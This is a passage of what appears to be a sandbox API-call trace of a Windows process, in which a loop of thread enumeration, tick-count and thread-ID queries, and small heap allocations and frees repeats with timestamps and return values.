(HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.396] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.397] GetTickCount () returned 0x113da39 [0203.397] GetCurrentThreadId () returned 0x600 [0203.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.397] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.398] GetTickCount () returned 0x113da39 [0203.398] GetCurrentThreadId () returned 0x600 [0203.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.398] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.398] GetTickCount () returned 0x113da39 [0203.398] GetCurrentThreadId () returned 0x600 [0203.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.399] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.399] GetTickCount () returned 0x113da39 [0203.399] GetCurrentThreadId () returned 0x600 [0203.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.399] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.400] GetTickCount () returned 0x113da39 [0203.400] GetCurrentThreadId () returned 0x600 [0203.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.400] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.401] GetTickCount () returned 0x113da39 [0203.401] GetCurrentThreadId () returned 0x600 [0203.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.401] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.401] GetTickCount () returned 0x113da39 [0203.401] GetCurrentThreadId () returned 0x600 [0203.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.401] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.402] GetTickCount () returned 0x113da39 [0203.402] GetCurrentThreadId () returned 0x600 [0203.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.402] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.403] GetTickCount () returned 0x113da39 [0203.403] GetCurrentThreadId () returned 0x600 [0203.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.403] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.403] GetTickCount () returned 0x113da39 [0203.403] GetCurrentThreadId () returned 0x600 [0203.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.404] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.404] GetTickCount () returned 0x113da39 [0203.404] GetCurrentThreadId () returned 0x600 [0203.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.404] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.405] GetTickCount () returned 0x113da39 [0203.405] GetCurrentThreadId () returned 0x600 [0203.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.405] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.406] GetTickCount () returned 0x113da39 [0203.406] GetCurrentThreadId () returned 0x600 [0203.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.406] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.406] GetTickCount () returned 0x113da39 [0203.406] GetCurrentThreadId () returned 0x600 [0203.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.406] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.407] GetTickCount () returned 0x113da39 [0203.407] GetCurrentThreadId () returned 0x600 [0203.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.407] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.408] GetTickCount () returned 0x113da39 [0203.408] GetCurrentThreadId () returned 0x600 [0203.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.408] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.408] GetTickCount () returned 0x113da39 [0203.408] GetCurrentThreadId () returned 0x600 [0203.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.408] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.409] GetTickCount () returned 0x113da39 [0203.409] GetCurrentThreadId () returned 0x600 [0203.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.409] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.410] GetTickCount () returned 0x113da39 [0203.410] GetCurrentThreadId () returned 0x600 [0203.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.410] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.410] GetTickCount () returned 0x113da39 [0203.410] GetCurrentThreadId () returned 0x600 [0203.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.410] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.411] GetTickCount () returned 0x113da49 [0203.411] GetCurrentThreadId () returned 0x600 [0203.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.411] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.412] GetTickCount () returned 0x113da49 [0203.412] GetCurrentThreadId () returned 0x600 [0203.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.412] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.412] GetTickCount () returned 0x113da49 [0203.412] GetCurrentThreadId () returned 0x600 [0203.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.412] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.413] GetTickCount () returned 0x113da49 [0203.413] GetCurrentThreadId () returned 0x600 [0203.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.413] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.414] GetTickCount () returned 0x113da49 [0203.414] GetCurrentThreadId () returned 0x600 [0203.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.414] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.414] GetTickCount () returned 0x113da49 [0203.414] GetCurrentThreadId () returned 0x600 [0203.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.415] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.415] GetTickCount () returned 0x113da49 [0203.415] GetCurrentThreadId () returned 0x600 [0203.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.415] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.416] GetTickCount () returned 0x113da49 [0203.416] GetCurrentThreadId () returned 0x600 [0203.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.416] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.416] GetTickCount () returned 0x113da49 [0203.416] GetCurrentThreadId () returned 0x600 [0203.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.417] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.417] GetTickCount () returned 0x113da49 [0203.417] GetCurrentThreadId () returned 0x600 [0203.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.417] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.418] GetTickCount () returned 0x113da49 [0203.418] GetCurrentThreadId () returned 0x600 [0203.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.418] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.418] GetTickCount () returned 0x113da49 [0203.419] GetCurrentThreadId () returned 0x600 [0203.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.419] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.419] GetTickCount () returned 0x113da49 [0203.419] GetCurrentThreadId () returned 0x600 [0203.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.419] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.420] GetTickCount () returned 0x113da49 [0203.420] GetCurrentThreadId () returned 0x600 [0203.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.420] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.421] GetTickCount () returned 0x113da49 [0203.421] GetCurrentThreadId () returned 0x600 [0203.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.421] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.421] GetTickCount () returned 0x113da49 [0203.421] GetCurrentThreadId () returned 0x600 [0203.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.421] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.422] GetTickCount () returned 0x113da49 [0203.422] GetCurrentThreadId () returned 0x600 [0203.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.422] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.423] GetTickCount () returned 0x113da49 [0203.423] GetCurrentThreadId () returned 0x600 [0203.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.423] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.423] GetTickCount () returned 0x113da49 [0203.423] GetCurrentThreadId () returned 0x600 [0203.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.423] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.424] GetTickCount () returned 0x113da49 [0203.424] GetCurrentThreadId () returned 0x600 [0203.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.424] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.425] GetTickCount () returned 0x113da49 [0203.425] GetCurrentThreadId () returned 0x600 [0203.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.425] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.425] GetTickCount () returned 0x113da49 [0203.425] GetCurrentThreadId () returned 0x600 [0203.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.425] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.426] GetTickCount () returned 0x113da49 [0203.426] GetCurrentThreadId () returned 0x600 [0203.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.426] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.427] GetTickCount () returned 0x113da58 [0203.427] GetCurrentThreadId () returned 0x600 [0203.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.427] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.428] GetTickCount () returned 0x113da58 [0203.428] GetCurrentThreadId () returned 0x600 [0203.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.428] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.428] GetTickCount () returned 0x113da58 [0203.428] GetCurrentThreadId () returned 0x600 [0203.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.428] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.429] GetTickCount () returned 0x113da58 [0203.429] GetCurrentThreadId () returned 0x600 [0203.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.429] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.430] GetTickCount () returned 0x113da58 [0203.430] GetCurrentThreadId () returned 0x600 [0203.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.430] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.430] GetTickCount () returned 0x113da58 [0203.430] GetCurrentThreadId () returned 0x600 [0203.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.430] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.431] GetTickCount () returned 0x113da58 [0203.431] GetCurrentThreadId () returned 0x600 [0203.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.431] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.432] GetTickCount () returned 0x113da58 [0203.432] GetCurrentThreadId () returned 0x600 [0203.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.432] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.432] GetTickCount () returned 0x113da58 [0203.432] GetCurrentThreadId () returned 0x600 [0203.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.432] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.433] GetTickCount () returned 0x113da58 [0203.433] GetCurrentThreadId () returned 0x600 [0203.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.433] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.434] GetTickCount () returned 0x113da58 [0203.434] GetCurrentThreadId () returned 0x600 [0203.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.434] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.434] GetTickCount () returned 0x113da58 [0203.434] GetCurrentThreadId () returned 0x600 [0203.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.435] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.435] GetTickCount () returned 0x113da58 [0203.435] GetCurrentThreadId () returned 0x600 [0203.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.435] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.436] GetTickCount () returned 0x113da58 [0203.436] GetCurrentThreadId () returned 0x600 [0203.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.436] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.436] GetTickCount () returned 0x113da58 [0203.436] GetCurrentThreadId () returned 0x600 [0203.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.437] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.437] GetTickCount () returned 0x113da58 [0203.437] GetCurrentThreadId () returned 0x600 [0203.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.437] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.438] GetTickCount () returned 0x113da58 [0203.438] GetCurrentThreadId () returned 0x600 [0203.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.438] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.438] GetTickCount () returned 0x113da58 [0203.439] GetCurrentThreadId () returned 0x600 [0203.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.439] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.439] GetTickCount () returned 0x113da58 [0203.439] GetCurrentThreadId () returned 0x600 [0203.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.439] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.440] GetTickCount () returned 0x113da58 [0203.440] GetCurrentThreadId () returned 0x600 [0203.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.440] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.441] GetTickCount () returned 0x113da58 [0203.441] GetCurrentThreadId () returned 0x600 [0203.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.441] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.441] GetTickCount () returned 0x113da58 [0203.441] GetCurrentThreadId () returned 0x600 [0203.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.441] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.442] GetTickCount () returned 0x113da58 [0203.442] GetCurrentThreadId () returned 0x600 [0203.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.442] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.443] GetTickCount () returned 0x113da68 [0203.443] GetCurrentThreadId () returned 0x600 [0203.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.443] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.443] GetTickCount () returned 0x113da68 [0203.443] GetCurrentThreadId () returned 0x600 [0203.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.443] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.444] GetTickCount () returned 0x113da68 [0203.444] GetCurrentThreadId () returned 0x600 [0203.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.444] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.445] GetTickCount () returned 0x113da68 [0203.445] GetCurrentThreadId () returned 0x600 [0203.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.445] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.445] GetTickCount () returned 0x113da68 [0203.445] GetCurrentThreadId () returned 0x600 [0203.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.445] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.446] GetTickCount 